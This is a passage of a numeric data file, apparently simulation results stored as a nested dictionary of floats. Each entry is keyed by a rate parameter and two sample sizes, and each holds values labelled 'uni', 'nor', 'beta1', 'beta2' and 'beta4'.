0.7026497048494321, 'beta2': 9.127638494088687, 'beta4': 0.19914538106246596}, 400: {'uni': 1.3464692788145056, 'nor': 16.675073125445905, 'beta1': 0.6560756046842351, 'beta2': 7.406779998790831, 'beta4': 0.1981648542595328}, 300: {'uni': 1.0884293558360072, 'nor': 12.372459331870136, 'beta1': 0.5877835264042439, 'beta2': 5.737333836923571, 'beta4': 0.20237617530927202}, 200: {'uni': 0.8631494900499794, 'nor': 8.300996637013071, 'beta1': 0.5248229438161377, 'beta2': 3.872762504402488, 'beta4': 0.2046459202157461}, 150: {'uni': 0.746249692807121, 'nor': 6.406640972978801, 'beta1': 0.5064527635631025, 'beta2': 2.971093545391119, 'beta4': 0.20257999588678052}, 100: {'uni': 0.6390360884623073, 'nor': 4.453947014982036, 'beta1': 0.4776849499506595, 'beta2': 2.111102696976735, 'beta4': 0.20637930623052075}, 75: {'uni': 0.5746789450804921, 'nor': 3.5964267643202255, 'beta1': 0.4853289552525349, 'beta2': 1.6426532163723997, 'beta4': 0.21022302629863826}, 50: {'uni': 0.5211310313766764, 'nor': 2.4917181735328917, 'beta1': 0.4700618462509633, 'beta2': 1.267274957963436, 'beta4': 0.2211410893248344}, 30: {'uni': 0.47804153947804207, 'nor': 1.6848055477508295, 'beta1': 0.44501316015962583, 'beta2': 0.891831606576434, 'beta4': 0.2400552361609186}, 20: {'uni': 0.4465223369536981, 'nor': 1.2624618308322546, 'beta1': 0.4422988766841338, 'beta2': 0.7196688797683929, 'beta4': 0.2604904005752692}, 10: {'uni': 0.4277837129953045, 'nor': 0.8471825992836655, 'beta1': 0.43299513108162596, 'beta2': 0.562251485700406, 'beta4': 0.30584932166436574}}}, 0.001: {1000: {1000: {'uni': 1.1936263539323357, 'nor': 2.1918383833877755, 'beta1': 1.1678025072294473, 'beta2': 6.774662646818605, 'beta4': 0.7926506036514294}, 750: {'uni': 1.1351909160899902, 'nor': 1.8986037036959484, 'beta1': 1.1407378263405077, 'beta2': 5.223023039944906, 'beta4': 0.8307779101630771}, 500: {'uni': 1.22774302421359, 'nor': 1.6238844893077675, 'beta1': 1.0804763693096529, 'beta2': 3.804599441299924, 'beta4': 0.8466317806886051}, 400: {'uni': 1.1307350302833419, 'nor': 1.5796751405899492, 'beta1': 1.2064530025809463, 'beta2': 3.3883927721160263, 'beta4': 0.9150569778427471}, 300: {'uni': 1.187305392407893, 'nor': 1.4695856313641065, 'beta1': 1.1535037606458525, 'beta2': 2.772300171422454, 'beta4': 0.8964266997411909}, 200: {'uni': 1.234831043093464, 'nor': 1.3415371409825303, 'beta1': 1.1787142641718298, 'beta2': 2.275931929701913, 'beta4': 1.00370282765997}, 150: {'uni': 1.1996709647495003, 'nor': 1.2937035420290128, 'beta1': 1.1430497852421209, 'beta2': 2.0677243693780016, 'beta4': 0.9643198579006903}, 100: {'uni': 1.1146343746429301, 'nor': 1.2892625248535499, 'beta1': 1.1776396387898163, 'beta2': 1.743862063916319, 'beta4': 1.0907431681894812}, 75: {'uni': 1.171991772371465, 'nor': 1.291285943681346, 'beta1': 1.1174834150199906, 'beta2': 1.4616564016626328, 'beta4': 1.151666583903703}, 50: {'uni': 1.154657400536598, 'nor': 1.1767961384785905, 'beta1': 1.1536256117334385, 'beta2': 1.43287463536852, 'beta4': 1.107820297759248}, 30: {'uni': 1.1398655580396513, 'nor': 1.142777717811652, 'beta1': 1.0608317535206289, 'beta2': 1.221456001179484, 'beta4': 1.1455911895467061}, 20: {'uni': 1.1039461056449387, 'nor': 1.206766578001503, 'beta1': 1.1269090338108658, 'beta2': 1.1721728315710964, 'beta4': 1.0682592850872188}, 10: {'uni': 1.1121748796693274, 'nor': 1.0749796486931948, 'beta1': 1.0466446681695234, 'beta2': 1.1960619623270785, 'beta4': 1.0802444621913325}}, 750: {1000: {'uni': 1.137661637991768, 'nor': 2.4752561072308645, 'beta1': 1.1582570984642369, 'beta2': 6.863542226032837, 'beta4': 0.6697597937935655}, 750: {'uni': 1.1143294017010406, 'nor': 2.2785887849344943, 'beta1': 1.1814831042585445, 'beta2': 5.4011216297097295, 'beta4': 0.7167053163957068}, 500: {'uni': 1.2511652529854431, 'nor': 1.827338619863956, 'beta1': 1.1412613149111919, 'beta2': 3.8244704455741334, 'beta4': 0.8517746234898397}, 400: {'uni': 1.1399104518317567, 'nor': 1.5874288173312812, 'beta1': 1.155582328147835, 'beta2': 3.1656085392977387, 'beta4': 0.8663874082318641}, 300: {'uni': 1.2225469901339128, 'nor': 1.5167836319695944, 'beta1': 1.11153781169305, 'beta2': 2.8873516129801815, 'beta4': 0.8996920327733064}, 200: {'uni': 1.0954755318435172, 'nor': 1.3881493471941568, 'beta1': 1.2269055582277115, 'beta2': 2.262420348293941, 'beta4': 1.013070644375399}, 150: {'uni': 1.3045698538839274, 'nor': 1.3196920805811456, 'beta1': 1.1880572964427405, 'beta2': 2.0558617667281225, 'beta4': 1.005991272842099}, 100: {'uni': 1.2187792043393142, 'nor': 1.2533805083824479, 'beta1': 1.1698674176276556, 'beta2': 1.7781988429118438, 'beta4': 1.0477156844601478}, 75: {'uni': 1.1368638382518677, 'nor': 1.3156273710113595, 'beta1': 1.1384065945892738, 'beta2': 1.520728851249668, 'beta4': 1.0715347444966783}, 50: {'uni': 1.1195348740382625, 'nor': 1.2217075820491097, 'beta1': 1.1191859871430045, 'beta2': 1.3208187892571224, 'beta4': 1.1549001358545659}, 30: {'uni': 1.2816617391006735, 'nor': 1.2457247512395753, 'beta1': 1.1579985679748264, 'beta2': 1.3374626422140403, 'beta4': 1.1743891961050419}, 20: {'uni': 1.1321158030897833, 'nor': 1.1806020500811683, 'beta1': 1.1445242993856557, 'beta2': 1.1994374982211218, 'beta4': 1.0684569229520247}, 10: {'uni': 1.0482034958303017, 'nor': 1.0837601898005667, 'beta1': 1.0616779987167078, 'beta2': 1.1126761632690636, 'beta4': 1.0098509988531303}}, 500: {1000: {'uni': 1.1750378415145837, 'nor': 3.146869341864523, 'beta1': 1.113523047098788, 'beta2': 7.532147143627789, 'beta4': 0.6366690553578839}, 750: {'uni': 1.073306431010815, 'nor': 2.785506492082125, 'beta1': 1.1569419751158654, 'beta2': 6.701734906168857, 'beta4': 0.6590873491367498}, 500: {'uni': 1.1865494646206205, 'nor': 2.1537630818158573, 'beta1': 1.1695402434000157, 'beta2': 4.861449944969511, 'beta4': 0.7573972651495522}, 400: {'uni': 1.2559700162444911, 'nor': 1.9444291825832516, 'beta1': 1.1664548294006372, 'beta2': 4.115283654847902, 'beta4': 0.7788833697755561}, 300: {'uni': 1.223882530974663, 'nor': 1.780734599585306, 'beta1': 1.181849766511381, 'beta2': 3.428927121287745, 'beta4': 0.8591100079004174}, 200: {'uni': 1.213711673102475, 'nor': 1.611703281792116, 'beta1': 1.111935660212546, 'beta2': 2.5258136249800422, 'beta4': 0.9379076876010537}, 150: {'uni': 1.1587728488156566, 'nor': 1.5088740961688971, 'beta1': 1.2536190947530212, 'beta2': 2.207157466230425, 'beta4': 0.9708178793619423}, 100: {'uni': 1.1068738509857443, 'nor': 1.4473315562593616, 'beta1': 1.2593071097914543, 'beta2': 1.9663232247120204, 'beta4': 1.039147765622215}, 75: {'uni': 1.2429995566003602, 'nor': 1.4276475545008478, 'beta1': 1.186401491303957, 'beta2': 1.632990789365755, 'beta4': 1.0812778097924176}, 50: {'uni': 1.237750828457372, 'nor': 1.2271226797959411, 'beta1': 1.1053381337393435, 'beta2': 1.4447132762085555, 'beta4': 1.0242240111478627}, 30: {'uni': 1.1636794654384857, 'nor': 1.2015932173450241, 'beta1': 1.1623019225244076, 'beta2': 1.320761147781629, 'beta4': 1.2103259711727377}, 20: {'uni': 1.0814390552372415, 'nor': 1.1400527764284605, 'beta1': 1.122921688334151, 'beta2': 1.2343857763528272, 'beta4': 1.1103764497171464}, 10: {'uni': 1.1215480866544199, 'nor': 1.1276367261668634, 'beta1': 1.0073667103864874, 'beta2': 1.1271701321078609, 'beta4': 1.064068238786582}}, 400: {1000: {'uni': 1.1709956621544848, 'nor': 3.803301620228012, 'beta1': 1.13585237795199, 'beta2': 7.931053647459394, 'beta4': 0.5668008916694507}, 750: {'uni': 1.123912386780943, 'nor': 3.0924072026943685, 'beta1': 1.2516107775524297, 'beta2': 6.555198333395497, 'beta4': 0.6761278412053991}, 500: {'uni': 1.1277026591617652, 'nor': 2.393764811280239, 'beta1': 1.2223718878397243, 'beta2': 4.682526270468999, 'beta4': 0.7026539605570044}, 400: {'uni': 1.171201628605453, 'nor': 2.1206626700151974, 'beta1': 1.195020309009892, 'beta2': 3.7936143215751352, 'beta4': 0.7015564268374034}, 300: {'uni': 1.1813580277825309, 'nor': 1.8319129414820265, 'beta1': 1.1583260826331316, 'beta2': 3.378981432298624, 'beta4': 0.8533135186126821}, 200: {'uni': 1.1527570203950765, 'nor': 1.6492093642401482, 'beta1': 1.1250559844035837, 'beta2': 2.629417175894674, 'beta4': 0.8945750181944908}, 150: {'uni': 1.1966402773104476, 'nor': 1.4174278460172554, 'beta1': 1.1312768855343165, 'beta2': 2.2423319800521555, 'beta4': 0.9353503917519674}, 100: {'uni': 1.1487242305792935, 'nor': 1.400351252329324, 'beta1': 1.1848680122044735, 'beta2': 1.9072201207315755, 'beta4': 1.0083131263386365}, 75: {'uni': 1.1734385077355995, 'nor': 1.3826407546880082, 'beta1': 1.0956863506586716, 'beta2': 1.7219247447211712, 'beta4': 1.1086330606702113}, 50: {'uni': 1.1837137777194917, 'nor': 1.3151632039352283, 'beta1': 1.167898128515975, 'beta2': 1.4839051821122797, 'beta4': 1.0817886556398897}, 30: {'uni': 1.1650313696484893, 'nor': 1.2684226276255366, 'beta1': 1.122760714762532, 'beta2': 1.3189729090742208, 'beta4': 1.0940981521464919}, 20: {'uni': 1.1445136060864975, 'nor': 1.1454415023439262, 'beta1': 1.0925797846896976, 'beta2': 1.267593178190832, 'beta4': 1.0882883216948513}, 10: {'uni': 1.0560264235231998, 'nor': 1.1780906323573201, 'beta1': 1.0365397983316262, 'beta2': 1.1437958793156668, 'beta4': 1.016287458324461}}, 300: {1000: {'uni': 1.1505797365385941, 'nor': 4.331982512119483, 'beta1': 1.1139526735347547, 'beta2': 9.469263809036718, 'beta4': 0.542849311740626}, 750: {'uni': 1.1758261434978927, 'nor': 3.7290481255519583, 'beta1': 1.1923496914716087, 'beta2': 7.813559953651863, 'beta4': 0.6059835632672069}, 500: {'uni': 1.181728515502452, 'nor': 2.8712256613239457, 'beta1': 1.1977959623656436, 'beta2': 5.3781790741274165, 'beta4': 0.6234478378948898}, 400: {'uni': 1.1420679660149184, 'nor': 2.3454510655315164, 'beta1': 1.2012772998377752, 'beta2': 4.64756804396548, 'beta4': 0.666155987456551}, 300: {'uni': 1.1132548996793066, 'nor': 2.2274013347829453, 'beta1': 1.0796836030332582, 'beta2': 3.4437770711726863, 'beta4': 0.8163520973610869}, 200: {'uni': 1.1695817222952798, 'nor': 1.7692957815475774, 'beta1': 1.1599743996759757, 'beta2': 2.784382083562161, 'beta4': 0.8364451298764334}, 150: {'uni': 1.1817571982797672, 'nor': 1.719512245624431, 'beta1': 1.1978025668978505, 'beta2': 2.3534864673445894, 'beta4': 0.8565768776251864}, 100: {'uni': 1.183952315096221, 'nor': 1.5311458905668298, 'beta1': 1.131782485730847, 'beta2': 2.065732436043435, 'beta4': 0.9070335463490746}, 75: {'uni': 1.1480746566834228, 'nor': 1.4155218896185913, 'beta1': 1.1645957200211898, 'beta2': 1.7843845120779571, 'beta4': 0.9973361357799707}, 50: {'uni': 1.1639419532835191, 'nor': 1.3626331228109334, 'beta1': 1.1576578080881406, 'beta2': 1.5222432381565012, 'beta4': 1.0709215102821763}, 30: {'uni': 1.2301310659161497, 'nor': 1.2519404957045004, 'beta1': 1.1315882862377566, 'beta2': 1.3482208892257823, 'beta4': 0.9920244358608241}, 20: {'uni': 1.154653019366009, 'nor': 1.2100560060524455, 'beta1': 1.2026849490243208, 'beta2': 1.477574606464069, 'beta4': 1.0772871940370845}, 10: {'uni': 1.08910832130117, 'nor': 1.1103645382687262, 'beta1': 1.0673808704064862, 'beta2': 1.144662691366984, 'beta4': 1.0824579533858352}}, 200: {1000: {'uni': 1.1527787642817615, 'nor': 6.454939390926548, 'beta1': 1.1761298896109023, 'beta2': 12.297910366361974, 'beta4': 0.5037081183232093}, 750: {'uni': 1.2093814994351852, 'nor': 4.628672560837682, 'beta1': 1.1600526734627739, 'beta2': 9.183147402660344, 'beta4': 0.5551361589383061}, 500: {'uni': 1.2078272726618189, 'nor': 3.6466332747210433, 'beta1': 1.2130237412448794, 'beta2': 6.686631421443718, 'beta4': 0.5617242997884774}, 400: {'uni': 1.206977516155348, 'nor': 3.1488854332188554, 'beta1': 1.1540803837353022, 'beta2': 5.520291627506234, 'beta4': 0.6183140008339282}, 300: {'uni': 1.1905791517893638, 'nor': 2.6963294032580256, 'beta1': 1.1396662759898903, 'beta2': 4.265413520085283, 'beta4': 0.6410626330993713}, 200: {'uni': 1.1155796690656294, 'nor': 2.098305098276549, 'beta1': 1.129861528955905, 'beta2': 3.4165984530534477, 'beta4': 0.784023515637043}, 150: {'uni': 1.176017350862461, 'nor': 1.9602832396544383, 'beta1': 1.18064576730146, 'beta2': 2.771704811214909, 'beta4': 0.7694104604666213}, 100: {'uni': 1.1870479832591068, 'nor': 1.708131299253773, 'beta1': 1.1546257226851904, 'beta2': 2.286248548348897, 'beta4': 0.8911986069890743}, 75: {'uni': 1.186734186489011, 'nor': 1.5988674993523462, 'beta1': 1.0890720658424244, 'beta2': 1.884040222161873, 'beta4': 0.9033227590425998}, 50: {'uni': 1.1448055037301, 'nor': 1.3510145910314486, 'beta1': 1.158526641543175, 'beta2': 1.5553795378788289, 'beta4': 0.9721645833372996}, 30: {'uni': 1.115202194775155, 'nor': 1.2996741282115147, 'beta1': 1.151604190486726, 'beta2': 1.4787210055138473, 'beta4': 1.05355865908588}, 20: {'uni': 1.1079466886008744, 'nor': 1.3176829776291565, 'beta1': 1.1104919106516336, 'beta2': 1.2858026496544552, 'beta4': 1.0625767800782984}, 10: {'uni': 1.0683808504100314, 'nor': 1.2213539981021235, 'beta1': 1.094155600283174, 'beta2': 1.1698982620724598, 'beta4': 1.0161201783101628}}, 150: {1000: {'uni': 1.2740272992236636, 'nor': 8.04791996644241, 'beta1': 1.167362655814843, 'beta2': 14.321827882861626, 'beta4': 0.5086649989916667}, 750: {'uni': 1.163578075351652, 'nor': 6.333220872122603, 'beta1': 1.1618587854601885, 'beta2': 10.078630783844831, 'beta4': 0.4866217170790821}, 500: {'uni': 1.1934251513310499, 'nor': 4.505679280354665, 'beta1': 1.1117564582293078, 'beta2': 7.5194623975801616, 'beta4': 0.5705530231959766}, 400: {'uni': 1.122035316119931, 'nor': 3.8691391166773323, 'beta1': 1.1694419741982156, 'beta2': 6.038197010971595, 'beta4': 0.6158188741996781}, 300: {'uni': 1.1470464121082826, 'nor': 3.274151981698333, 'beta1': 1.1506222290932826, 'beta2': 4.984385703067292, 'beta4': 0.6333396610313405}, 200: {'uni': 1.098044155143792, 'nor': 2.442058113795611, 'beta1': 1.190113631847934, 'beta2': 3.5693409544554564, 'beta4': 0.6585422486234873}, 150: {'uni': 1.1798570227406169, 'nor': 2.148902743538671, 'beta1': 1.1146678037413222, 'beta2': 3.040356329025905, 'beta4': 0.7390811919239978}, 100: {'uni': 1.1275603196569395, 'nor': 1.8634314040985047, 'beta1': 1.194982037114541, 'beta2': 2.4529169572961322, 'beta4': 0.7908591909063069}, 75: {'uni': 1.1010305363772324, 'nor': 1.7694707664540448, 'beta1': 1.1666529715718625, 'beta2': 2.240058572032016, 'beta4': 0.8738369125828138}, 50: {'uni': 1.0912147396467624, 'nor': 1.565184178967182, 'beta1': 1.168396593748277, 'beta2': 1.7986102324845101, 'beta4': 0.9613948793245802}, 30: {'uni': 1.176564975653703, 'nor': 1.3666259356184134, 'beta1': 1.18788036406429, 'beta2': 1.5016532133782363, 'beta4': 1.0139702282396725}, 20: {'uni': 1.095065206271104, 'nor': 1.245541829425765, 'beta1': 1.108511879249995, 'beta2': 1.307809873245305, 'beta4': 1.0376227789112373}, 10: {'uni': 1.1024407913868932, 'nor': 1.088965057821255, 'beta1': 1.047559539941666, 'beta2': 1.2305914089743843, 'beta4': 1.0555065357965625}}, 100: {1000: {'uni': 1.1854021246412352, 'nor': 11.016060727019472, 'beta1': 1.2051656975636194, 'beta2': 15.957467784586559, 'beta4': 0.4992260856865924}, 750: {'uni': 1.2376115548225521, 'nor': 9.068522333669398, 'beta1': 1.244046634396399, 'beta2': 12.076005102020233, 'beta4': 0.5130977526919601}, 500: {'uni': 1.1648958063745838, 'nor': 6.1072839572345, 'beta1': 1.1268676414225556, 'beta2': 7.854398191492699, 'beta4': 0.49958427017588514}, 400: {'uni': 1.1512278350516503, 'nor': 5.392715793997558, 'beta1': 1.1696021387623763, 'beta2': 7.332529107921338, 'beta4': 0.5328982120077344}, 300: {'uni': 1.1043591222583407, 'nor': 4.4365428928964254, 'beta1': 1.1132005110374124, 'beta2': 5.628002146631942, 'beta4': 0.5536099970772167}, 200: {'uni': 1.1946682563618547, 'nor': 3.3521570330308985, 'beta1': 1.2773341961233582, 'beta2': 4.004404893156947, 'beta4': 0.5837234579894335}, 150: {'uni': 1.1871501213686806, 'nor': 2.6193172667330704, 'beta1': 1.2297350806502172, 'beta2': 3.2042632533037256, 'beta4': 0.664274700436926}, 100: {'uni': 1.1497621584178024, 'nor': 2.1108766254691096, 'beta1': 1.1782324016667887, 'beta2': 2.5577399519012474, 'beta4': 0.746926383653656}, 75: {'uni': 1.1351408307441955, 'nor': 1.9522867474160084, 'beta1': 1.17767812715346, 'beta2': 2.1504826050745596, 'beta4': 0.7800890585405549}, 50: {'uni': 1.1263071014294783, 'nor': 1.8648089116567583, 'beta1': 1.1165179662639755, 'beta2': 1.9238108413225985, 'beta4': 0.9041009123841088}, 30: {'uni': 1.0926805561594322, 'nor': 1.4407528275952637, 'beta1': 1.188495602696405, 'beta2': 1.4665059544892458, 'beta4': 0.9539791513025705}, 20: {'uni': 1.121846468062343, 'nor': 1.328793041952113, 'beta1': 1.1664944334710992, 'beta2': 1.4522639614141404, 'beta4': 0.9956736124755978}, 10: {'uni': 1.1204549491237221, 'nor': 1.2323011448950902, 'beta1': 1.0928258842828849, 'beta2': 1.1531922357852749, 'beta4': 1.0153739202425465}}, 75: {1000: {'uni': 1.332821520339607, 'nor': 15.930089443152745, 'beta1': 1.171289101639284, 'beta2': 18.174364842184723, 'beta4': 0.47321284305584627}, 750: {'uni': 1.237290264475581, 'nor': 11.490043022545008, 'beta1': 1.189059377730262, 'beta2': 14.62336228067083, 'beta4': 0.5246962209488442}, 500: {'uni': 1.1921816708526098, 'nor': 8.46428457112535, 'beta1': 1.1404773815220697, 'beta2': 9.354886012350446, 'beta4': 0.5042313193695894}, 400: {'uni': 1.172495477607942, 'nor': 7.06519806952231, 'beta1': 1.1409970424303444, 'beta2': 8.453757070459439, 'beta4': 0.5275066908015517}, 300: {'uni': 1.2465428749029002, 'nor': 5.077552364373244, 'beta1': 1.2207943511424872, 'beta2': 5.989394174052176, 'beta4': 0.5145819316096251}, 200: {'uni': 1.21364225652058, 'nor': 3.793546862065341, 'beta1': 1.143576109267149, 'beta2': 4.450035842097597, 'beta4': 0.5722235640628546}, 150: {'uni': 1.1973537999124575, 'nor': 3.209445041412377, 'beta1': 1.1671496584378878, 'beta2': 3.6863319201894784, 'beta4': 0.6184152779108703}, 100: {'uni': 1.0730621748849436, 'nor': 2.515170518881428, 'beta1': 1.124202789251099, 'beta2': 2.853910469618436, 'beta4': 0.7079223488677664}, 75: {'uni': 1.1908002668890179, 'nor': 2.164307715576605, 'beta1': 1.1022232454630696, 'beta2': 2.6088159557751553, 'beta4': 0.7334138456473607}, 50: {'uni': 1.1327461894839026, 'nor': 1.7201198114580145, 'beta1': 1.1319588983511386, 'beta2': 1.875704530171311, 'beta4': 0.8228333594398864}, 30: {'uni': 1.1604850914644518, 'nor': 1.507022954768851, 'beta1': 1.1184205952563668, 'beta2': 1.7049042795022542, 'beta4': 0.9090222616137686}, 20: {'uni': 1.0762655242253933, 'nor': 1.4024810972045139, 'beta1': 1.03796705073592, 'beta2': 1.4861849386146158, 'beta4': 0.9723829285399783}, 10: {'uni': 1.0557491101661625, 'nor': 1.1837049281841963, 'beta1': 1.166904154786038, 'beta2': 1.2828863202120704, 'beta4': 0.988651200103153}}, 50: {1000: {'uni': 1.4413407568858028, 'nor': 22.566743280217178, 'beta1': 1.2276482007225256, 'beta2': 23.056210692408463, 'beta4': 0.4660189481672189}, 750: {'uni': 1.2718280400240256, 'nor': 16.30493656353458, 'beta1': 1.1326711971589989, 'beta2': 17.81662862884342, 'beta4': 0.4728350561687182}, 500: {'uni': 1.172235040453299, 'nor': 11.8095459061109, 'beta1': 1.181820315426212, 'beta2': 11.662524110362135, 'beta4': 0.48534660865668927}, 400: {'uni': 1.2867021297441419, 'nor': 9.511213374630067, 'beta1': 1.2268838616908635, 'beta2': 9.279921733726201, 'beta4': 0.4945713984775927}, 300: {'uni': 1.1906774155008837, 'nor': 7.799766973090263, 'beta1': 1.1087965280456227, 'beta2': 7.004329940698066, 'beta4': 0.4948098176026741}, 200: {'uni': 1.206765832059108, 'nor': 5.495221421844641, 'beta1': 1.1424530528570438, 'beta2': 5.236791374243084, 'beta4': 0.5249512538272287}, 150: {'uni': 1.1170041207411467, 'nor': 4.3935496972015, 'beta1': 1.1360421454285754, 'beta2': 4.307820473968464, 'beta4': 0.5295783353350124}, 100: {'uni': 1.1694439140708475, 'nor': 3.225800948995303, 'beta1': 1.1621945829082418, 'beta2': 3.0646789563538985, 'beta4': 0.6485731805209067}, 75: {'uni': 1.1306779142265537, 'nor': 2.662959575031019, 'beta1': 1.1778740846961646, 'beta2': 2.4852673590966248, 'beta4': 0.7258091242476691}, 50: {'uni': 1.1941609396429214, 'nor': 2.268899895733848, 'beta1': 1.1179901890554762, 'beta2': 1.9249867348265446, 'beta4': 0.7226933151870409}, 30: {'uni': 1.1178041704281778, 'nor': 1.7330770857627482, 'beta1': 1.1113467743710106, 'beta2': 1.8092372960659309, 'beta4': 0.8367650025431632}, 20: {'uni': 1.083908466243809, 'nor': 1.7186907573668564, 'beta1': 1.083302381748618, 'beta2': 1.5393750399929973, 'beta4': 0.8843295960246518}, 10: {'uni': 1.0487945600677406, 'nor': 1.2709613436276843, 'beta1': 1.0965000588955878, 'beta2': 1.2197123454385659, 'beta4': 0.9498288164294515}}, 30: {1000: {'uni': 1.8025024634308071, 'nor': 34.25391130897347, 'beta1': 1.1885614558788913, 'beta2': 29.85311114615026, 'beta4': 0.44359490195802476}, 750: {'uni': 1.5718950453388483, 'nor': 25.931606992440997, 'beta1': 1.233787933808761, 'beta2': 22.222336937321206, 'beta4': 0.47171304922279156}, 500: {'uni': 1.403990081760866, 'nor': 19.873193730295956, 'beta1': 1.2365306225266401, 'beta2': 14.658302774468805, 'beta4': 0.47265105875053215}, 400: {'uni': 1.4005854960541118, 'nor': 14.275653195236494, 'beta1': 1.214820107700645, 'beta2': 11.752460418098707, 'beta4': 0.4649244188284235}, 300: {'uni': 1.3560572497527095, 'nor': 12.509697042432672, 'beta1': 1.1642210787364398, 'beta2': 8.687500402569903, 'beta4': 0.48001789365740266}, 200: {'uni': 1.3078770132829531, 'nor': 8.242370389013965, 'beta1': 1.1516547957019738, 'beta2': 6.242815309406197, 'beta4': 0.4898507763421597}, 150: {'uni': 1.2387509836120234, 'nor': 6.212710987107977, 'beta1': 1.0759699330173904, 'beta2': 4.88761333337693, 'beta4': 0.510446983736842}, 100: {'uni': 1.231601768722487, 'nor': 4.5761367907404225, 'beta1': 1.1487740706520697, 'beta2': 3.5175168730166617, 'beta4': 0.5486902188853022}, 75: {'uni': 1.0693543659957778, 'nor': 3.951109643287017, 'beta1': 1.159979011102066, 'beta2': 3.144205840473643, 'beta4': 0.6245822913647954}, 50: {'uni': 1.142865316506463, 'nor': 2.969464463659539, 'beta1': 1.1592908541069569, 'beta2': 2.3836666468730012, 'beta4': 0.6332045220521555}, 30: {'uni': 1.0780858467029557, 'nor': 2.2574174573745505, 'beta1': 1.1744480844394878, 'beta2': 1.8478740024591505, 'beta4': 0.7343335412858117}, 20: {'uni': 1.0661001511027859, 'nor': 1.8097097184403295, 'beta1': 1.1520955489343616, 'beta2': 1.589815348006933, 'beta4': 0.799204183667358}, 10: {'uni': 1.1068513962930462, 'nor': 1.4174803659728914, 'beta1': 1.0195412075619765, 'beta2': 1.2736913537907808, 'beta4': 0.9086670084626601}}, 20: {1000: {'uni': 2.1816898666989353, 'nor': 54.589719460785915, 'beta1': 1.2780684016305557, 'beta2': 34.326668467189265, 'beta4': 0.42822336518380305}, 750: {'uni': 2.008633513369925, 'nor': 44.01386503835255, 'beta1': 1.1910602410914366, 'beta2': 25.92566104708618, 'beta4': 0.4563357309045434}, 500: {'uni': 1.7305415449208486, 'nor': 27.626080265992513, 'beta1': 1.2716481133711786, 'beta2': 17.339855281822697, 'beta4': 0.45580442590011244}, 400: {'uni': 1.6535339448650972, 'nor': 22.71498971521692, 'beta1': 1.2541165554611715, 'beta2': 14.250093795750274, 'beta4': 0.4549406486288468}, 300: {'uni': 1.5052840944772048, 'nor': 17.85214260880071, 'beta1': 1.1639571625183778, 'beta2': 11.414421423641553, 'beta4': 0.4659886102645737}, 200: {'uni': 1.3497443785045566, 'nor': 12.360091713030048, 'beta1': 1.1717637987871659, 'beta2': 7.455419425198178, 'beta4': 0.47174970505848157}, 150: {'uni': 1.3331996994902409, 'nor': 9.288283829992508, 'beta1': 1.2506008956247794, 'beta2': 6.08397354138583, 'beta4': 0.4686509521384706}, 100: {'uni': 1.2687928512207793, 'nor': 6.558077105937877, 'beta1': 1.1613621405497763, 'beta2': 4.103340600228283, 'beta4': 0.48725121395441656}, 75: {'uni': 1.2299552447081301, 'nor': 5.171143302936504, 'beta1': 1.1199869147433412, 'beta2': 3.3288792386276485, 'beta4': 0.5273865297234503}, 50: {'uni': 1.090863672616496, 'nor': 3.700143871425098, 'beta1': 1.0922976037420196, 'beta2': 2.6115744897059754, 'beta4': 0.594876803029818}, 30: {'uni': 1.0853328914480391, 'nor': 2.646623445458865, 'beta1': 1.0736193852418847, 'beta2': 1.96046643608669, 'beta4': 0.6252246663540566}, 20: {'uni': 1.1496312474830275, 'nor': 2.003838638976139, 'beta1': 1.2149235284576705, 'beta2': 1.6737605753508866, 'beta4': 0.7318124922604088}, 10: {'uni': 1.0302973694434716, 'nor': 1.6481938151667288, 'beta1': 1.0090308312145542, 'beta2': 1.4427058937732395, 'beta4': 0.8372887168016149}}, 10: {1000: {'uni': 4.47761779649345, 'nor': 106.97243626351514, 'beta1': 1.7718712572599664, 'beta2': 50.89972781133419, 'beta4': 0.45035039981991665}, 750: {'uni': 3.524513869962408, 'nor': 77.33864323159318, 'beta1': 1.6594491239956215, 'beta2': 36.25193105958197, 'beta4': 0.45647026837978366}, 500: {'uni': 2.933652803232629, 'nor': 56.19541613997431, 'beta1': 1.412868106014215, 'beta2': 24.493194030260376, 'beta4': 0.45626898980087244}, 400: {'uni': 2.5868581455589927, 'nor': 41.97644401918418, 'beta1': 1.3845576358953788, 'beta2': 20.500958607909546, 'beta4': 0.4503472771888699}, 300: {'uni': 2.1638043642684397, 'nor': 31.371026430711506, 'beta1': 1.3272523442702153, 'beta2': 15.391703293162744, 'beta4': 0.426134575227121}, 200: {'uni': 1.8664012577325673, 'nor': 23.02116576643852, 'beta1': 1.1669422527582627, 'beta2': 9.917500823904055, 'beta4': 0.4686925986716054}, 150: {'uni': 1.7272031794635727, 'nor': 15.992174734196075, 'beta1': 1.1700097974836747, 'beta2': 7.593771525578843, 'beta4': 0.45209920535131604}, 100: {'uni': 1.5210995197369952, 'nor': 11.60348589966613, 'beta1': 1.2199502179320187, 'beta2': 5.80028326920741, 'beta4': 0.45568014305226345}, 75: {'uni': 1.3099777177647, 'nor': 9.081005946150388, 'beta1': 1.0858315960507317, 'beta2': 4.53706520639466, 'beta4': 0.4977455754301163}, 50: {'uni': 1.3698349812635664, 'nor': 6.4873540534480245, 'beta1': 1.1411439665960967, 'beta2': 3.223332209368324, 'beta4': 0.4833115916272488}, 30: {'uni': 1.113033156501957, 'nor': 4.298523360691007, 'beta1': 1.1621220740176146, 'beta2': 2.235410496252283, 'beta4': 0.515573259834472}, 20: {'uni': 1.15231886075087, 'nor': 3.1542586458579533, 'beta1': 1.0959485235296258, 'beta2': 1.8690482386517902, 'beta4': 0.6022690986627974}, 10: {'uni': 1.0545459710410021, 'nor': 2.1410930258529346, 'beta1': 1.0432471611208785, 'beta2': 1.366107687212368, 'beta4': 0.7483649469211368}}}, 0.005: {1000: {1000: {'uni': 0.8492986502558074, 'nor': 1.6502490676284018, 'beta1': 0.8928233637722481, 'beta2': 5.0465080846258035, 'beta4': 0.554324759981653}, 750: {'uni': 0.876649520000162, 'nor': 1.4627775450104223, 'beta1': 0.8927432912877891, 'beta2': 4.0831718791391065, 'beta4': 0.5839305121400691}, 500: {'uni': 0.8314273255127868, 'nor': 1.2427601107117765, 'beta1': 0.8616522044180317, 'beta2': 2.907878706545564, 'beta4': 0.6644891840401165}, 400: {'uni': 0.8711765218939584, 'nor': 1.1725637742176804, 'beta1': 0.8945007645711051, 'beta2': 2.513524008354758, 'beta4': 0.7063402078076012}, 300: {'uni': 0.866990878802388, 'nor': 1.0601280123390195, 'beta1': 0.871577011386766, 'beta2': 1.990868873830486, 'beta4': 0.732977364574049}, 200: {'uni': 0.8484587729105408, 'nor': 1.0344752399437118, 'beta1': 0.8685203061001582, 'beta2': 1.6180514467121998, 'beta4': 0.7806210956771433}, 150: {'uni': 